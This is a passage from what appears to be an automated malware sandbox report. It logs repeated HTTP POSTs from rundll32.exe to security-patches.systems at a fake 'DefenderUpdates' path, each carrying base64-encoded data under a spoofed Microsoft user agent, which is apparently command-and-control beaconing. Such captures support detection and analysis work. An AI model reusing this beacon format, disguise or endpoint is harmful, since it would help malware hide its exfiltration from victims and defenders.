                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:11:38.216408014 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:11:37 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            3192.168.2.549746185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:11:38.479367018 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:11:39.948884010 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:11:39 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            4192.168.2.549752185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:11:40.213043928 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:11:41.680079937 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:11:41 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            5192.168.2.549756185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:11:41.945080042 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:11:43.394124031 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:11:43 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            6192.168.2.549761185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:11:43.665031910 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:11:45.177700043 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:11:44 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            7192.168.2.549764185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:11:45.445751905 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:11:47.057837009 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:11:46 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            8192.168.2.549769185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:11:47.320147038 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:11:48.904329062 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:11:48 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            9192.168.2.549773185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:11:49.169487000 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:11:50.930134058 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:11:50 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            10192.168.2.549778185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:11:51.193985939 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:11:52.867885113 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:11:52 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            11192.168.2.549782185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:11:53.131274939 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:11:54.653659105 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:11:54 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            12192.168.2.549784185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:11:54.917206049 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
                                            Data Ascii: data=eyJDS3oiOiJxUHl5IiwiRnN0TCI6InE4ck43cE1wQm5LaSttZ0V2Q25TcmhBPSIsInZZdEIiOiJqY0tqIiwidm9KYyI6Im1PYXF5dz09Iiwid0FjSCI6InFPQ095Y3MzYWc9PSIsInhlQ2NqUyI6InUvcUYyZz09IiwieWlpVVhZIjoicmJPOC84NXFJRi80dkFONjlSNm9vbjVUa3dsN2Rib2p4aFF3U1ZnWEVnST0ifQ==
                                            Dec 6, 2024 22:11:56.353245974 CET218INHTTP/1.1 200 OK
                                            Date: Fri, 06 Dec 2024 21:11:56 GMT
                                            Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
                                            X-Powered-By: PHP/8.2.12
                                            Content-Length: 20
                                            Content-Type: text/html; charset=UTF-8
                                            Data Raw: 65 79 4a 55 55 47 51 69 4f 69 4a 71 59 30 74 71 49 6e 30 3d
                                            Data Ascii: eyJUUGQiOiJqY0tqIn0=


                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                            13192.168.2.549785185.234.216.17544437096C:\Windows\SysWOW64\rundll32.exe
                                            TimestampBytes transferredDirectionData
                                            Dec 6, 2024 22:11:56.617316008 CET461OUTPOST /WinDefUpdates/DefenderUpdates/index.php HTTP/1.1
                                            User-Agent: Microsoft-WNS/10.0
                                            Host: security-patches.systems
                                            Content-Length: 245
                                            Content-Type: application/x-www-form-urlencoded
                                            Accept-Language: fr-CA
                                            Data Raw: 64 61 74 61 3d 65 79 4a 44 53 33 6f 69 4f 69 4a 78 55 48 6c 35 49 69 77 69 52 6e 4e 30 54 43 49 36 49 6e 45 34 63 6b 34 33 63 45 31 77 51 6d 35 4c 61 53 74 74 5a 30 56 32 51 32 35 54 63 6d 68 42 50 53 49 73 49 6e 5a 5a 64 45 49 69 4f 69 4a 71 59 30 74 71 49 69 77 69 64 6d 39 4b 59 79 49 36 49 6d 31 50 59 58 46 35 64 7a 30 39 49 69 77 69 64 30 46 6a 53 43 49 36 49 6e 46 50 51 30 39 35 59 33 4d 7a 59 57 63 39 50 53 49 73 49 6e 68 6c 51 32 4e 71 55 79 49 36 49 6e 55 76 63 55 59 79 5a 7a 30 39 49 69 77 69 65 57 6c 70 56 56 68 5a 49 6a 6f 69 63 6d 4a 50 4f 43 38 34 4e 58 46 4a 52 69 38 30 64 6b 46 4f 4e 6a 6c 53 4e 6d 39 76 62 6a 56 55 61 33 64 73 4e 32 52 69 62 32 70 34 61 46 46 33 55 31 5a 6e 57 45 56 6e 53 54 30 69 66 51 3d 3d
